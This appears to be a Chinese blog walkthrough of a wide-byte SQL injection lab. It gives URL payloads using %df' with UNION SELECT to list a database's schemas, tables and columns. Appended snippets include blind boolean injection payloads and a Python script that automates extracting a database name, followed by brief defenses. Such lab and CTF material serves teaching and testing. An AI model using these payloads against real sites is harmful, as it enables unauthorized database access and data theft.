sql(宽度注入)

最新推荐文章于 2024-07-11 20:46:01 发布
最新推荐文章于 2024-07-11 20:46:01 发布
阅读量120 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_50401030/article/details/108970186

  • 进入关卡

在这里插入图片描述

  • 查数据库

?id=1.1%df%27%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20--+

在这里插入图片描述

  • 查表

?id=1.1%df%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20--+

在这里插入图片描述

  • 查字段

?id=1.1%df%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x75736572%20--+

在这里插入图片描述
然后找需要的内容!!!

haozhu945
关注
渗透攻防Web篇-SQL注入攻击初级
人人为我,我为人人
12-28 584
前言 不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一,这里我想问,我们真的了解SQL注入吗?看完本篇文章希望能让你更加深刻的认识SQL注入。 目录 第一节 注入攻击原理及自己编写注入点 1.1、什么是SQL? 1.2、什么是SQL注入? 1.3、SQL注入是怎么样产生的? 1.4、编写注入点 第二节 寻找及确认SQL注入 2.1、推理测试法 2.2、a
SQL-字符宽度
崔吉钰的博客
09-27 1224
create table test ( num int(5) zerofill ); 类型为int,宽度为5,添加一个zerofill属性(存入数值在不足宽度情况下,左侧补0) 字符不足5会补零 字符超出5也不会影响显示 mysql bigint(20)中20指的是该字段下能输入的最大数字长度。 括号里的数字叫数据的宽度,不同的数据类型对宽度的处理也不一样: 1、整数类型,这里显示的宽度和数据类型...
MySQL中数值类型(列类型)与显示宽度
小小默:进无止境
05-08 5349
所谓的数据类型:对数据进行统一的分类。从系统的角度出发为了能够使用统一的方式进行管理,以便更好的利用有限的资源空间。SQL将数据分为了三大类:数值类型、字符串类型和时间日期型。如下图所示:【1】数值类型系统将数值类型分为整数型和小说型。【1.1】整数型存放整型数据,在SQL中考虑磁盘空间问题又细分为五类: Tinyint:迷你整型。一个字节存储,最多可表示256种状态(2 的八次方); Smalli......
SQL注入漏洞测试(宽字节)
qq_36933272的博客
08-31 233
1.注入类型 http://219.153.49.228:40122/new_list.php?id=-1%df’报错,判断是宽注入 2.字段数 http://219.153.49.228:40122/new_list.php?id=-1%df’ order by 5 http://219.153.49.228:40122/new_list.php?id=-1%df’ order by 6报错,得...
在一个宽字节注入习题的情况下得到的知识集合
zezai3010的博客
12-13 1006
一、数据库schema的解释 数据库中Schema和Database有什么区别 - 人生似烟的日志 - 网易博客 http://blog.163.com/baibai_zheng/blog/static/51980755201022125325689/ 在MySQL中创建一个Schema好像就跟创建一个Database是一样的效果,在SQL Server和Orcal数据库中好像又不一样. 目
SQL注入之宽字节注入
m0_46467017的博客
08-09 1789
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,则称为宽字节。像等这些编码都是常说的宽字节,也就是只有两个字节。英文默认占一个字节,中午占两个字节。原理:宽字节注入发送的位置就是PHP发送请求到MYSQL时字符集使用设置一次编码。在使用PHP连接Mysql的时候,当设置时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入。...
sql注入之宽字节注入
m0_52484587的博客
07-11 1107
str:需要添加反斜线的字符串。
sql注入详解
m0_73109590的博客
08-03 1117
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
sql手工注入
qq_45747465的博客
08-25 633
sql注入手工
sql 使用语句改变列宽
宜臶瑏芯的博客
01-09 4592
ALTER TABLE  [GuoJiaStationDay]  ALTER  COLUMN  Weather VARCHAR (255)
SQL数据库中的数据类型长度——怎么取值
回家养老
03-07 4520
1.在创建数据库的时候int(10),varchar(255)中括号后面的数字代表什么意思? 括号里的数字叫数据的宽度,单数不同的数据类型对宽度的处理也不一样:在mysql中创建表时,varchar类型必须指定长度,int类型可以不指定长度。 一、整数类型 这里显示的宽度和数据类型的取值范围是没有任何关系的,显示宽度只是指明Mysql最大可能显示的数字个数,数值的位数小于指定的宽度时会由空格...
sql中长度
weixin_41926640的博客
09-09 2970
由于oracle 和mysql 的语法差异,所以其函数也不同,其中针对不同的字符编码处理方式也不一样 ORACLE下取长度: lengthb(str)计算字符串所有的字节长度:返回字符串的长度,单位是字节 select lengthb('测试') FROM DUAL; -- 4(GBK)/6(UTF-8) 1 length(str)计算字符串所有的字符长度:返回字符串的长度,单...
(学习)SQL注入--宽字节注入
Huang921的博客
11-21 3933
SQL注入–宽字节注入实践
mysql sql长度限制解决
zero的博客
10-02 9471
mysql sql长度限制问题
宽字节注入详解
热门推荐
qq_45927819的博客
03-26 1万+
文章目录1、涉及函数2、原理分析3、实战南邮nctf-sql injection 3sql-labs-32关 1、涉及函数 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符 mysql_escape_string() 转义一个字符串 2、原理分析 先了解一下什么是窄、宽字节已经常见宽字节编码: 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称
一张图读懂:城商行、农商行、村镇银行以及互联网小贷牌照区别(1)(1).doc
最新发布
06-22
一张图读懂:城商行、农商行、村镇银行以及互联网小贷牌照区别(1)(1).doc
企业信息化项目管理8要点(1).docx
06-22
企业信息化项目管理8要点(1).docx
自动化毕业设计论文题目大全(1)(1).doc
06-22
自动化毕业设计论文题目大全(1)(1).doc
ctf sql注入布尔盲注
03-23
### CTF SQL 布尔盲注 攻防技巧 漏洞利用 示例教程 #### 什么是SQL布尔盲注? SQL布尔盲注是一种通过观察页面返回的不同状态来判断注入条件是否成立的技术。它不依赖于错误消息或时间延迟,而是依据页面逻辑的变化来进行推断。通常情况下,攻击者会向目标应用发送一系列带有不同参数的请求,并根据响应的内容差异逐步还原数据库中的敏感信息。 布尔盲注的核心在于构造能够触发真假分支的查询语句[^2]。例如,在某些场景下,如果注入点允许执行如下形式的SQL片段: ```sql AND (SELECT ASCII(SUBSTRING((SELECT database()),1,1))=X) ``` 那么可以通过调整`X`的值逐一测试字符编码,直到找到使整个表达式为真的情况为止。 #### 如何实现SQL布尔盲注? 以下是几个常见的技术要点以及其实现方法: ##### 1. 判断长度 为了获取字段的具体内容,首先需要知道其总长度。这一步骤可通过不断增大比较数值完成: ```sql ' AND LENGTH(database())>N--+ ``` 其中 `N` 是从零开始递增的一个整数变量。一旦发现某个临界点使得前后端交互行为发生变化,则说明当前尝试接近实际大小[^3]。 ##### 2. 提取单个字节 明确了字符串的整体规模之后,就可以逐位提取组成它的各个组成部分了。下面给出了一种标准模式用于检索指定位置上的ASCII码值: ```sql ' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='yourdb'),M,N))<Z --+ ``` 这里分别代表起始偏移量(`M`)、截取宽度(`N`)还有上限阈值(`Z`)三个重要参数设置选项。通过对这些属性灵活组合运用即可达成最终目的——即重建完整的原始记录条目列表[^4]。 ##### 3. 自动化脚本编写 手动操作效率低下而且容易出错,因此建议开发专用工具辅助分析过程。Python语言因其简洁易懂而成为首选方案之一。以下展示了一个简单的框架结构供参考: ```python import requests url = 'http://example.com/vuln.php?id=' true_str = '<h1>Welcome</h1>' false_str = '' def check(payload): r = requests.get(url + payload) return true_str in r.text and false_str not in r.text length = 0 while True: length += 1 if not check(f"' AND LENGTH(database())={length}--+"): break print(f'Database name has {length-1} characters.') result = '' for i in range(1, length): low, high = 0, 128 while low < high: mid = (low + high) >> 1 if check(f"' AND ASCII(SUBSTR(database(),{i},1))>{mid}--+"): low = mid + 1 else: high = mid result += chr(low) print('Database:', result) ``` 此代码片段展示了如何自动化探测MySQL数据库名称的过程。注意替换相应的URL地址和标志串以适应具体环境需求[^1]。 #### 防御措施 针对上述提到的各种潜在威胁,可以从以下几个方面加强防护力度: - **输入验证**: 对所有外部提交的数据进行全面校验,拒绝不符合预期格式的内容进入后续处理流程。 - **最小权限原则**: 确保应用程序运行账户仅具备必要的访问权利,从而减少可能造成的损害范围。 - **预编译语句**: 使用ORM或者PreparedStatement等方式构建SQL指令,有效规避动态拼接带来的风险隐患。 - **日志审计**: 定期审查服务器活动历史记录,及时察觉异常状况并采取相应补救行动。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值